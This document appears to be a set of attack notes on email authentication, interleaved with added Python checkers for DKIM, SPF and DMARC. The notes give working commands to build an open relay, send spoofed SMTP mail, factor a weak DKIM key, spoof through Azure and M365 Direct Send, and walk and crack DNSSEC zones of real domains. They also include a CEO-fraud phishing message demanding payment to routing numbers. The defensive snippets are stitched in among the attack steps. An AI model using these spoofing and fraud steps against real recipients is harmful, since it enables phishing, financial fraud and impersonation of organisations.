-
SPF and DMARC Bypass via SMTP Open Relaying
# Here is a website that checks for SMTP open relaying
https://tools.appriver.com/OpenRelay.aspx?server=209.38.78.151
# Installing a postfix open relay
sudo apt install postfix
sudo nano /etc/postfix/main.cf
# Add the following lines
mynetworks = 0.0.0.0/0 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
permit_mynetworks = yes
# Restart postfix
sudo service postfix restart
# Nmap scanning for an open relay
nmap -p 25,587,465 -v --open --script smtp-open-relay 209.38.78.151 | grep -E "Server is an open relay|MAIL FROM:" -B 6
# Using the open relay
telnet 209.38.78.151 25
HELO smtprelay.me
MAIL FROM: <jack@smtprelay.me>
RCPT TO: <mymailfail42@gmail.com>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
From: jack@smtprelay.me
To: mymailfail42@gmail.com
Subject: Did that invoice go out?
--NextMimePart
Content-Type: text/html;
Hey Mike, this is Jack, your CEO. Did you ever send out that invoice for the holiday party?
If not, here are the routing numbers:
1234567890
I've attached the invoice for your convenience. You should get this done ASAP, or it will affect your performance review.
Sincerely,
Your Boss
.
-
Cracking DKIM RSA Keys
dig TXT smtpapi._domainkey.m.ail.fail +short
# https://gist.github.com/ACK-J/487d0de5737458d953ca818a0645b09b
wget https://gist.githubusercontent.com/ACK-J/487d0de5737458d953ca818a0645b09b/raw/817e9d3c0faeb81844a4a81be6818d582ff493ea/Reconstruct_Private_RSA_Key.py
# Private Key Values of p and q
# 114243475724741248833595122844512882880944338610909134738011440161029226847479
# 98382782872834099683871479139393781262822034994021043042450594450215266838447
vim Reconstruct_Private_RSA_Key.py
python3 Reconstruct_Private_RSA_Key.py
cat > cracked_private_key.pem
# https://gist.github.com/ACK-J/76585af46375641ec841cb6b77d345c3
vim Send_DKIM_Email.py
python3 Send_DKIM_Email.py
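The factorisation above only works because the selector published a short RSA modulus. An added example (not part of the original notes or the linked gists): a pure-Python checker that reads a DKIM TXT record, parses the base64 SPKI in its p= tag with a minimal DER reader, and reports the modulus size; the sample record is constructed here from the two factors quoted above (p*q, e=65537), so it is not a real published record.

```python
import base64
# Minimal DER helpers: just enough to build and read an RSA SubjectPublicKeyInfo.
def der_len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b

def tlv(tag, body):
    return bytes([tag]) + der_len(len(body)) + body

def der_int(v):
    b = v.to_bytes((v.bit_length() + 7) // 8, "big")
    return tlv(0x02, b"\x00" + b if b[0] & 0x80 else b)

def rsa_spki(n, e=65537):
    """Encode an RSA public key as the SPKI DER that a DKIM 'p=' tag carries in base64."""
    alg = tlv(0x30, tlv(0x06, bytes.fromhex("2a864886f70d010101")) + tlv(0x05, b""))
    return tlv(0x30, alg + tlv(0x03, b"\x00" + tlv(0x30, der_int(n) + der_int(e))))

def der_read(buf, pos=0):
    """Return (tag, body, next_pos) for the TLV element starting at pos."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        k = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + ln], pos + ln

def dkim_modulus_bits(txt):
    """Parse a DKIM TXT record and return the RSA modulus size in bits."""
    tags = dict(t.strip().split("=", 1) for t in txt.split(";") if "=" in t)
    spki = base64.b64decode(tags["p"].replace(" ", ""))
    _, body, _ = der_read(spki)            # SubjectPublicKeyInfo SEQUENCE
    _, _, pos = der_read(body)             # skip AlgorithmIdentifier
    _, bits, _ = der_read(body, pos)       # BIT STRING; first byte is the unused-bits count
    _, rsapub, _ = der_read(bits[1:])      # RSAPublicKey SEQUENCE
    _, n_bytes, _ = der_read(rsapub)       # modulus INTEGER comes first
    return int.from_bytes(n_bytes, "big").bit_length()

def assess_dkim(txt, minimum=2048):
    """RFC 8301 still lets verifiers accept 1024-bit keys; 2048 is the floor for new selectors."""
    bits = dkim_modulus_bits(txt)
    return bits, "OK" if bits >= minimum else f"WEAK: rotate to a {minimum}-bit key"

def sample_record(n, e=65537):
    """Constructed DKIM TXT value for a given modulus (not a real published record)."""
    return "v=DKIM1; k=rsa; p=" + base64.b64encode(rsa_spki(n, e)).decode()

# Constructed sample: the modulus is p*q from the two factors quoted above.
P = 114243475724741248833595122844512882880944338610909134738011440161029226847479
Q = 98382782872834099683871479139393781262822034994021043042450594450215266838447
WEAK_RECORD = sample_record(P * Q)
```

assess_dkim(WEAK_RECORD) reports a 512-bit modulus and flags it as WEAK; feed it the output of the dig command above to check a live selector.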
-
Finding SPF/DMARC Misconfigs
# Downloading the script to check for DMARC and SPF misconfigurations
wget https://gist.githubusercontent.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9/raw/5ad366adf6abdaaf981fd8bede5223f543e4242c/DMARC_and_SPF_Check.py
# Downloading a file of the top one million domain names
wget https://downloads.majesticseo.com/majestic_million.csv
# Formatting the file
cat majestic_million.csv | tail -n +2 | cut -d ',' -f 3 > majestic_million.csv.txt
# Running the script with the formatted file
python3 DMARC_and_SPF_Check.py majestic_million.csv.txt
# Showing that a domain's SPF record is pointing at my current IP address
dig TXT spf.m.ail.fail +short
# Showing my current IP
curl ifconfig.me
# Connecting to Proton Mail's email server
# Spoof SPF
# Take advantage of the domain's misconfigured SPF and DMARC records
telnet mailsec.protonmail.ch 25
HELO spf.m.ail.fail
MAIL FROM: <jack@spf.m.ail.fail>
RCPT TO: <mymailfail42@proton.me>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
To: mymailfail42@proton.me
From: vader@starwars.com
Subject: Your Inbox Has Fallen to the Dark Side
--NextMimePart
Content-Type: text/html;
I find your email habits... disturbing.
Effective immediately:
- "Free lightsaber!" will trigger a full investigation by the Empire.
May the inbox be with you.
Darth Vader
Sith Lord & Email Administrator
.
-
Spoof Misconfigured DMARC and SPF
# Open a cloud shell using portal.azure.com
# Get the MX record of the victim domain and substitute it below as the SMTP server
# If your IP gets blocked by Spamhaus, restart cloud shell to get a new IP
Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To "Victim@example.com" -From "ceo@BadDMARC.com" -Subject "Misconfigured DMARC" -Body "Misconfigured DMARC" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl
-
Spoofing DMARC PCT!=100
# Downloading the script to check for DMARC and SPF misconfigurations
wget https://gist.githubusercontent.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9/raw/5ad366adf6abdaaf981fd8bede5223f543e4242c/DMARC_and_SPF_Check.py
# Downloading a file of the top one million domain names
wget https://downloads.majesticseo.com/majestic_million.csv
# Formatting the file
cat majestic_million.csv | tail -n +2 | cut -d ',' -f 3 > majestic_million.csv.txt
# Check for domains with pct= in the DMARC policy
python3 DMARC_and_SPF_Check.py majestic_million.csv.txt | grep "less than 100%"
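The checks the script above runs over the majestic_million list (here and in the Finding SPF/DMARC Misconfigs section) come down to a few record-level conditions. An added example, not the gist's own code: a record evaluator that takes the raw _dmarc and SPF TXT values and lists the weaknesses each one leaves open (missing record, p=none, pct below 100, unpoliced subdomains, +all/?all, no all term, and more than 10 lookup terms); the sample records are constructed, not real zone data.

```python
import re
LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}  # each costs a DNS query

def parse_tags(record):
    """Split a 'tag=value; tag=value' TXT record (DMARC style) into a dict."""
    pairs = (t.partition("=") for t in record.split(";"))
    return {k.strip().lower(): v.strip() for k, _, v in pairs if k.strip()}

def assess_dmarc(record):
    """List what a spoofer gains from the _dmarc TXT value ('' when absent)."""
    if not record.lower().startswith("v=dmarc1"):
        return ["no DMARC record: the From header is never policed"]
    t, out = parse_tags(record), []
    p = t.get("p", "none").lower()
    if p == "none":
        out.append("p=none: failing mail is only reported, never rejected")
    pct = int(t.get("pct", "100"))
    if pct < 100 and p != "none":
        out.append(f"pct={pct}: only {pct}% of failing mail gets p={p}, the rest is downgraded one level")
    if t.get("sp", p).lower() == "none" and p != "none":
        out.append("sp=none: subdomains are not policed")
    if "rua" not in t:
        out.append("no rua: aggregate reports are not collected")
    return out

def assess_spf(record):
    """List the weaknesses in an SPF TXT value ('' when absent)."""
    if not record.lower().startswith("v=spf1"):
        return ["no SPF record"]
    terms = [x.lower() for x in record.split()[1:]]
    out = []
    tail = next((x for x in terms if x.lstrip("+-~?") == "all"), None)
    if tail is None and not any(x.startswith("redirect=") for x in terms):
        out.append("no 'all' term: unlisted senders get a neutral result")
    elif tail in ("all", "+all"):
        out.append("+all: every host on the internet passes SPF")
    elif tail == "?all":
        out.append("?all: neutral, equivalent to having no policy")
    lookups = sum(re.split(r"[:=/]", x.lstrip("+-~?"))[0] in LOOKUP_TERMS for x in terms)
    if lookups > 10:
        out.append(f"{lookups} lookup terms: over the limit of 10, so SPF evaluates to permerror")
    return out

# Constructed sample records (not real zone data), in the shape the script above reports on.
DMARC_PARTIAL = "v=DMARC1; p=reject; pct=25; rua=mailto:dmarc@example.com"
SPF_OPEN = "v=spf1 +all"
SPF_SANE = "v=spf1 ip4:203.0.113.0/24 include:_spf.example.net -all"

if __name__ == "__main__":
    print(assess_dmarc(DMARC_PARTIAL), assess_dmarc(""), assess_spf(SPF_OPEN), assess_spf(SPF_SANE))
```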
# An easy way to send spoofed emails is with Cloud Shell on portal.azure.com
# Replace the SMTP server and victim email below
Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To victim@example.com -From jack@epicgames.com -Subject "Howdy" -Body "Misconfigured DMARC" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl
-
Spoofing Internal Emails via Direct Send
# Replace the SMTP server with a M365 MX record and the To and From fields
Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To victim@vulnerable.com -From ceo@vulnerable.com -Subject "Microsoft Direct Send Spoofing Test" -Body "Microsoft Direct Send Spoofing Test" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl
-
NSEC Walking
# Install the dependencies
sudo apt-get install pipx python3 python3-pip python3-dev gcc libssl3 libssl-dev
# Install n3map using pipx
pipx install n3map[predict]
# NSEC walk Stanford
n3map -v -A --output www.stanford.edu.zone stanford.edu
# View the results
vim www.stanford.edu.zone
-
NSEC3 Walking and Cracking
# Install the dependencies
sudo apt-get install pipx python3 python3-pip python3-dev gcc libssl3 libssl-dev
# Install n3map using pipx
pipx install n3map[predict]
# NSEC3 walk nsa.gov
n3map -v -A --output nsa.gov.zone nsa.gov --predict
# View the results
vim nsa.gov.zone
# Convert the results to hashcat format
n3map-hashcatify nsa.gov.zone nsa.gov.hashcat
# Crack the subdomains using hashcat
hashcat --potfile-disable -m 8300 nsa.gov.hashcat /opt/wordlists/goldmine-2024-small.txt
-
Spoofed Reply-To: Header
# Showing that a domain's SPF record is pointing at my current IP address
dig TXT spf.m.ail.fail +short
# Showing my current IP
curl ifconfig.me
# Connect to Proton Mail's SMTP server
# Spoof SPF
# Include a Reply-To: header with a different email
telnet mailsec.protonmail.ch 25
HELO spf.m.ail.fail
MAIL FROM: <jack@spf.m.ail.fail>
RCPT TO: <mymailfail42@proton.me>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
To: mymailfail42@proton.me
Reply-To: vader@starwars-corp.com
From: vader@starwars.com
Subject: Your Inbox Has Fallen to the Dark Side
--NextMimePart
Content-Type: text/html;
I find your email habits... disturbing.
Effective immediately:
- "Free lightsaber!" will trigger a full investigation by the Empire.
May the inbox be with you.
Darth Vader
Sith Lord & Email Administrator
.
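In both Proton Mail sessions above, SPF passes because the MAIL FROM domain (spf.m.ail.fail) authorizes the sending IP, while the From header names starwars.com; only DMARC identifier alignment ties the two together, and the Reply-To header is never authenticated at all. An added example, not part of the original notes: a header checker that applies DMARC alignment (relaxed or strict) between the envelope sender, the DKIM d= domain and the From header, and flags a Reply-To domain that differs from From. The messages are constructed from the sessions above; Return-Path stands in for MAIL FROM as a receiving MTA records it, and org_domain approximates the Public Suffix List with the last two labels.

```python
import email, re

def org_domain(domain):
    """Organizational domain. Assumption: last two labels stand in for a Public Suffix List lookup."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])

def addr_domain(value):
    """Domain part of the first address in a header value, or None."""
    m = re.search(r"@([A-Za-z0-9.-]+)", value or "")
    return m.group(1).lower() if m else None

def aligned(auth_domain, from_domain, mode="r"):
    """DMARC alignment: exact match in strict mode, same organizational domain in relaxed."""
    if not (auth_domain and from_domain):
        return False
    return auth_domain == from_domain if mode == "s" else org_domain(auth_domain) == org_domain(from_domain)

def analyze(raw, aspf="r", adkim="r"):
    """Flag a message whose authenticated identifiers or Reply-To do not match its From header."""
    msg = email.message_from_string(raw)
    from_d = addr_domain(msg.get("From"))
    mfrom_d = addr_domain(msg.get("Return-Path"))   # envelope MAIL FROM as recorded by the MTA
    m = re.search(r"\bd=([^;\s]+)", msg.get("DKIM-Signature", ""))
    dkim_d = m.group(1).lower() if m else None       # only the d= tag is read, not verified
    reply_d = addr_domain(msg.get("Reply-To"))
    findings = []
    if not (aligned(mfrom_d, from_d, aspf) or aligned(dkim_d, from_d, adkim)):
        findings.append(f"DMARC fails: neither MAIL FROM {mfrom_d} nor DKIM d={dkim_d or '(none)'} aligns with From {from_d}")
    if reply_d and reply_d != from_d:
        findings.append(f"Reply-To domain {reply_d} differs from From domain {from_d}")
    return findings

# Constructed messages (not captured mail): the spoofed session above, and a normally signed one.
SPOOFED = """Return-Path: <jack@spf.m.ail.fail>
From: vader@starwars.com
Reply-To: vader@starwars-corp.com
Subject: Your Inbox Has Fallen to the Dark Side

I find your email habits... disturbing.
"""
LEGIT = """Return-Path: <bounce@mail.example.com>
DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=sel; b=...
From: ceo@example.com
Subject: Staff meeting

See you at ten.
"""
```

analyze(SPOOFED) returns both findings, analyze(LEGIT) returns an empty list in relaxed and strict mode alike, since the DKIM d= domain matches From exactly even though the bounce subdomain would not.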